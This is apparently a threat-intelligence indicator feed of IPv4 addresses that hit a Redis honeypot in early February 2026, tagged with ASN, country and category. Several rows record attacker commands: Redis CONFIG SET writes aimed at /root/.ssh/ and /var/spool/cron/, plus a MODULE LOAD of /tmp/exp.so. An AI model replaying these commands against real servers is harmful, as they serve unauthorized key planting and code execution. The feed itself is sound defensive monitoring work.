| IPv4 | 172.234.192.95 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-02-03 | |
| IPv4 | 172.236.228.197 | Attacker IP • Redis / seen in Redishoneypot; events=27; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-03 | |
| IPv4 | 180.76.114.78 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=38365; asn_org=Beijing Baidu Netcom Science and Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-03 | |
| IPv4 | 45.33.110.79 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-02-03 | |
| IPv4 | 45.33.80.243 | Attacker IP • Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-03 | |
| IPv4 | 47.244.168.170 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=HK; asn=45102; asn_org=Alibaba US Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-03 | |
| IPv4 | 20.168.122.61 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-03 | |
| IPv4 | 20.163.58.125 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-03 | |
| IPv4 | 159.89.231.162 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-02-03 | |
| IPv4 | 45.156.87.221 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=NL; asn=51396; asn_org=Pfcloud UG (haftungsbeschrankt); redis_cmd_hits=0 | bruteforce | 2026-02-03 | |
| IPv4 | 167.86.125.252 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=FR; asn=51167; asn_org=Contabo GmbH; redis_cmd_hits=0 | scanning_host | 2026-02-03 | |
| IPv4 | 8.130.138.41 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-03 | |
| IPv4 | 205.210.31.213 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-03 | |
| IPv4 | 13.52.221.200 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-03 | |
| IPv4 | 147.93.178.1 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=40021; asn_org=Contabo Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-03 | |
| IPv4 | 172.214.44.51 | Attacker IP • Redis / seen in Redishoneypot; events=17; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; cats=Generic Protocol Command Decode; redis_cmds=CONFIG GET dbfilename,CONFIG SET dbfilename dump.rdb,CONFIG SET dir /var/spool/cron/,CONFIG SET dir /data,CONFIG SET dir /root/.ssh/; redis_cmd_hits=0; cmd="CONFIG SET dir /data" | malware_hosting | 2026-02-03 | |
| IPv4 | 88.202.190.157 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=GB; asn=13213; asn_org=UK-2 Limited; redis_cmd_hits=0 | scanning_host | 2026-02-03 | |
| IPv4 | 114.80.35.241 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4811; asn_org=China Telecom Group; redis_cmd_hits=0 | scanning_host | 2026-02-03 | |
| IPv4 | 138.68.169.168 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=GB; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-02-03 | |
| IPv4 | 206.168.34.44 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-03 | |
| IPv4 | 59.110.22.149 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-03 | |
| IPv4 | 163.223.13.184 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=VN; asn=153651; asn_org=QPPF Company Limited; redis_cmd_hits=0 | bruteforce | 2026-02-03 | |
| IPv4 | 185.242.226.42 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=202425; asn_org=IP Volume inc; redis_cmd_hits=0 | scanning_host | 2026-02-03 | |
| IPv4 | 106.225.133.217 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=134238; asn_org=CHINANET Jiangx province IDC network; redis_cmd_hits=0 | scanning_host | 2026-02-04 | |
| IPv4 | 176.65.148.210 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=NL; asn=51396; asn_org=Pfcloud UG (haftungsbeschrankt); redis_cmd_hits=0 | scanning_host | 2026-02-04 | |
| IPv4 | 135.237.130.147 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmds=CONFIG SET dir /var/spool/cron/,CONFIG GET dir,CONFIG SET dir /data,CONFIG GET dbfilename,CONFIG SET dir /root/.ssh/; redis_cmd_hits=0; cmd="CONFIG SET dir /data" | malware_hosting | 2026-02-04 | |
| IPv4 | 57.158.137.222 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=SG; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-04 | |
| IPv4 | 86.54.31.32 | Attacker IP • Redis / seen in Redishoneypot; events=17; ports=6379; cc=CA; asn=12989; asn_org=Black HOST Ltd; redis_cmd_hits=0 | bruteforce | 2026-02-04 | |
| IPv4 | 209.38.136.79 | Attacker IP • Redis / seen in Redishoneypot; events=16; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-02-04 | |
| IPv4 | 106.12.184.7 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=38365; asn_org=Beijing Baidu Netcom Science and Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-04 | |
| IPv4 | 1.203.97.227 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4847; asn_org=China Networks Inter-Exchange; redis_cmd_hits=0 | scanning_host | 2026-02-04 | |
| IPv4 | 161.35.13.46 | Attacker IP • Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-04 | |
| IPv4 | 161.35.9.14 | Attacker IP • Redis / seen in Redishoneypot; events=17; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-04 | |
| IPv4 | 185.204.170.133 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=DE; asn=57568; asn_org=Arvancloud Global Technologies L.L.C; redis_cmd_hits=0 | scanning_host | 2026-02-04 | |
| IPv4 | 41.223.51.250 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=GN; asn=37665; asn_org=MouNa; redis_cmd_hits=0 | scanning_host | 2026-02-04 | |
| IPv4 | 106.227.11.236 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=134238; asn_org=CHINANET Jiangx province IDC network; redis_cmd_hits=0 | scanning_host | 2026-02-04 | |
| IPv4 | 8.142.178.141 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-04 | |
| IPv4 | 20.65.193.89 | Attacker IP • Redis / seen in Redishoneypot; events=23; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-04 | |
| IPv4 | 64.62.156.66 | Attacker IP • Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | bruteforce | 2026-02-04 | |
| IPv4 | 64.62.156.76 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-02-04 | |
| IPv4 | 167.94.138.129 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-04 | |
| IPv4 | 66.132.153.141 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-04 | |
| IPv4 | 71.6.199.65 | Attacker IP • Redis / seen in Redishoneypot; events=19; ports=6379; cc=US; asn=10439; asn_org=CariNet, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-04 | |
| IPv4 | 52.21.227.35 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-04 | |
| IPv4 | 71.6.232.30 | Attacker IP • Redis / seen in Redishoneypot; events=18; ports=6379; cc=US; asn=10439; asn_org=CariNet, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-04 | |
| IPv4 | 221.236.21.55 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=38283; asn_org=CHINANET SiChuan Telecom Internet Data Center; redis_cmd_hits=0 | scanning_host | 2026-02-04 | |
| IPv4 | 117.72.186.146 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=141679; asn_org=China Telecom Beijing Tianjin Hebei Big Data Industry Park Branch; redis_cmd_hits=0 | scanning_host | 2026-02-04 | |
| IPv4 | 168.138.41.6 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=JP; asn=31898; asn_org=Oracle Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-04 | |
| IPv4 | 39.107.103.199 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-04 | |
| IPv4 | 65.49.1.162 | Attacker IP • Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | bruteforce | 2026-02-04 | |
| IPv4 | 65.49.1.165 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-02-04 | |
| IPv4 | 205.210.31.242 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-04 | |
| IPv4 | 101.100.3.239 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=NZ; asn=17492; asn_org=Vector Communications LTD.; redis_cmd_hits=0 | bruteforce | 2026-02-04 | |
| IPv4 | 172.182.195.82 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmds=CONFIG SET dir /root/.ssh/,CONFIG SET dir /data,CONFIG SET dbfilename dump.rdb,CONFIG SET dir /var/spool/cron/,CONFIG GET dbfilename; redis_cmd_hits=0; cmd="CONFIG SET dir /data" | malware_hosting | 2026-02-04 | |
| IPv4 | 45.130.148.86 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=UZ; asn=35682; asn_org=Best Internet Solution Xk; redis_cmd_hits=0 | scanning_host | 2026-02-04 | |
| IPv4 | 94.74.84.246 | Attacker IP • Redis / seen in Redishoneypot; events=8; ports=6379; cc=SG; asn=136907; asn_org=HUAWEI CLOUDS; redis_cmd_hits=0 | bruteforce | 2026-02-04 | |
| IPv4 | 143.198.165.252 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-02-04 | |
| IPv4 | 74.249.192.232 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-04 | |
| IPv4 | 74.50.81.220 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=19318; asn_org=Interserver, Inc; redis_cmd_hits=0 | bruteforce | 2026-02-04 | |
| IPv4 | 14.103.174.237 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4811; asn_org=China Telecom Group; redis_cmd_hits=0 | scanning_host | 2026-02-05 | |
| IPv4 | 185.242.226.2 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=202425; asn_org=IP Volume inc; redis_cmd_hits=0 | scanning_host | 2026-02-05 | |
| IPv4 | 64.236.134.49 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmds=CONFIG GET dbfilename,CONFIG GET dir,CONFIG SET dir /root/.ssh/,CONFIG SET dir /data,CONFIG SET dir /var/spool/cron/; redis_cmd_hits=0; cmd="CONFIG SET dir /data" | malware_hosting | 2026-02-05 | |
| IPv4 | 91.239.78.28 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=UA; asn=6698; asn_org=Virtual Systems LLC; redis_cmd_hits=0 | scanning_host | 2026-02-05 | |
| IPv4 | 117.50.47.100 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4808; asn_org=China Unicom Beijing Province Network; redis_cmd_hits=0 | scanning_host | 2026-02-05 | |
| IPv4 | 159.223.103.223 | Attacker IP • Redis / seen in Redishoneypot; events=17; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-05 | |
| IPv4 | 161.35.49.103 | Attacker IP • Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-05 | |
| IPv4 | 183.6.4.31 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0 | scanning_host | 2026-02-05 | |
| IPv4 | 8.218.228.75 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=HK; asn=45102; asn_org=Alibaba US Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-05 | |
| IPv4 | 20.84.117.189 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-05 | |
| IPv4 | 65.39.151.180 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CA; asn=13768; asn_org=Aptum Technologies; redis_cmd_hits=0 | bruteforce | 2026-02-05 | |
| IPv4 | 159.223.135.251 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-02-05 | |
| IPv4 | 31.210.36.192 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=TR; asn=212219; asn_org=Hosting Dunyam Bilisim Teknolojileri Ticaret Limited Sirketi; redis_cmd_hits=0 | scanning_host | 2026-02-05 | |
| IPv4 | 101.206.108.12 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0 | scanning_host | 2026-02-05 | |
| IPv4 | 79.72.83.185 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=GB; asn=31898; asn_org=Oracle Corporation; redis_cmd_hits=0 | scanning_host | 2026-02-05 | |
| IPv4 | 18.219.157.186 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-05 | |
| IPv4 | 123.56.141.52 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-05 | |
| IPv4 | 185.165.171.43 | Attacker IP • Redis / seen in Redishoneypot; events=29; ports=6379; cc=IS; asn=200651; asn_org=FlokiNET ehf; redis_cmd_hits=0 | bruteforce | 2026-02-05 | |
| IPv4 | 65.49.1.66 | Attacker IP • Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | bruteforce | 2026-02-05 | |
| IPv4 | 65.49.1.73 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-02-05 | |
| IPv4 | 14.103.220.97 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4811; asn_org=China Telecom Group; redis_cmd_hits=0 | scanning_host | 2026-02-05 | |
| IPv4 | 172.234.218.34 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-02-05 | |
| IPv4 | 77.83.240.70 | Attacker IP • Redis / seen in Redishoneypot; events=16; ports=6379; cc=US; asn=49870; asn_org=Alsycon B.V.; cats=Generic Protocol Command Decode; redis_cmds=GET /_asterisk/graph.php HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-02-05 | |
| IPv4 | 167.94.138.185 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-05 | |
| IPv4 | 185.242.226.21 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=202425; asn_org=IP Volume inc; redis_cmd_hits=0 | scanning_host | 2026-02-05 | |
| IPv4 | 206.189.115.177 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=GB; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-02-05 | |
| IPv4 | 61.242.178.28 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0 | scanning_host | 2026-02-05 | |
| IPv4 | 86.54.31.42 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=CA; asn=12989; asn_org=Black HOST Ltd; redis_cmd_hits=0 | scanning_host | 2026-02-05 | |
| IPv4 | 100.51.6.16 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-05 | |
| IPv4 | 150.158.97.56 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0 | scanning_host | 2026-02-05 | |
| IPv4 | 8.136.108.109 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-05 | |
| IPv4 | 103.197.188.243 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=ID; asn=133800; asn_org=PT Biznet Gio Nusantara; redis_cmd_hits=0 | scanning_host | 2026-02-05 | |
| IPv4 | 52.226.249.192 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-05 | |
| IPv4 | 142.93.255.85 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-02-05 | |
| IPv4 | 142.93.4.224 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-02-05 | |
| IPv4 | 199.45.154.177 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398722; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-05 | |
| IPv4 | 199.45.154.32 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398722; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-05 | |
| IPv4 | 199.45.155.76 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398722; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-05 | |
| IPv4 | 20.168.109.87 | Attacker IP • Redis / seen in Redishoneypot; events=16; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmds=CONFIG GET dbfilename,CONFIG GET dir,CONFIG SET dir /var/spool/cron/,CONFIG SET dir /root/.ssh/,CONFIG SET dir /data; redis_cmd_hits=0; cmd="CONFIG SET dir /data" | malware_hosting | 2026-02-05 | |
| IPv4 | 193.163.125.25 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=GB; asn=211298; asn_org=Driftnet Ltd; redis_cmd_hits=0 | scanning_host | 2026-02-05 | |
| IPv4 | 194.68.26.182 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=SG; asn=9009; asn_org=M247 Europe SRL; redis_cmd_hits=0 | scanning_host | 2026-02-05 | |
| IPv4 | 198.235.24.91 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-06 | |
| IPv4 | 47.242.108.71 | Attacker IP • Redis / seen in Redishoneypot; events=39; ports=6379; cc=HK; asn=45102; asn_org=Alibaba US Technology Co., Ltd.; redis_cmds=config set dir .,config set dir /var/spool/cron/,MODULE LOAD /tmp/exp.so,SLAVEOF NO ONE,config set dbfilename root; redis_cmd_hits=0; cmd="config set dbfilename dump.rdb" | command_and_control | 2026-02-06 | |
| IPv4 | 103.90.233.162 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=VN; asn=135917; asn_org=Cong ty TNHH Web Panda; redis_cmd_hits=0 | scanning_host | 2026-02-06 | |
| IPv4 | 216.180.246.133 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=396982; asn_org=Google LLC; redis_cmd_hits=0 | scanning_host | 2026-02-06 | |
| IPv4 | 216.180.246.211 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=396982; asn_org=Google LLC; redis_cmd_hits=0 | scanning_host | 2026-02-06 | |
| IPv4 | 120.205.80.220 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=9808; asn_org=China Mobile Communications Group Co., Ltd.; redis_cmd_hits=0 | bruteforce | 2026-02-06 | |
| IPv4 | 71.6.199.87 | Attacker IP • Redis / seen in Redishoneypot; events=18; ports=6379; cc=US; asn=10439; asn_org=CariNet, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-06 | |
| IPv4 | 117.35.25.154 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0 | scanning_host | 2026-02-06 | |
| IPv4 | 40.124.175.86 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-06 | |
| IPv4 | 167.248.133.119 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-06 | |
| IPv4 | 198.46.237.139 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=36352; asn_org=HostPapa; redis_cmd_hits=0 | bruteforce | 2026-02-06 | |
| IPv4 | 74.82.47.16 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-02-06 | |
| IPv4 | 74.82.47.4 | Attacker IP • Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | bruteforce | 2026-02-06 | |
| IPv4 | 3.129.102.120 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-06 | |
| IPv4 | 172.237.155.29 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-02-06 | |
| IPv4 | 47.120.79.252 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-06 | |
| IPv4 | 186.194.54.114 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=BR; asn=53107; asn_org=EVEO S.A.; redis_cmd_hits=0 | scanning_host | 2026-02-06 | |
| IPv4 | 195.26.240.229 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=40021; asn_org=Contabo Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-06 | |
| IPv4 | 125.88.205.65 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=58466; asn_org=CHINANET Guangdong province network; redis_cmd_hits=0 | bruteforce | 2026-02-06 | |
| IPv4 | 167.94.138.139 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-06 | |
| IPv4 | 167.94.138.36 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-06 | |
| IPv4 | 47.111.110.34 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | bruteforce | 2026-02-06 | |
| IPv4 | 123.56.146.124 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-06 | |
| IPv4 | 91.230.168.12 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; redis_cmd_hits=0 | scanning_host | 2026-02-06 | |
| IPv4 | 192.241.142.140 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-02-06 | |
| IPv4 | 46.101.146.208 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=DE; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-02-06 | |
| IPv4 | 91.230.168.1 | Attacker IP • Redis / seen in Redishoneypot; events=14; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-06 | |
| IPv4 | 91.230.168.7 | Attacker IP • Redis / seen in Redishoneypot; events=13; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-02-06 | |
| IPv4 | 159.223.128.195 | Attacker IP • Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-06 | |
| IPv4 | 185.242.226.4 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=202425; asn_org=IP Volume inc; redis_cmd_hits=0 | scanning_host | 2026-02-06 | |
| IPv4 | 82.208.23.70 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=FR; asn=51167; asn_org=Contabo GmbH; redis_cmd_hits=0 | bruteforce | 2026-02-06 | |
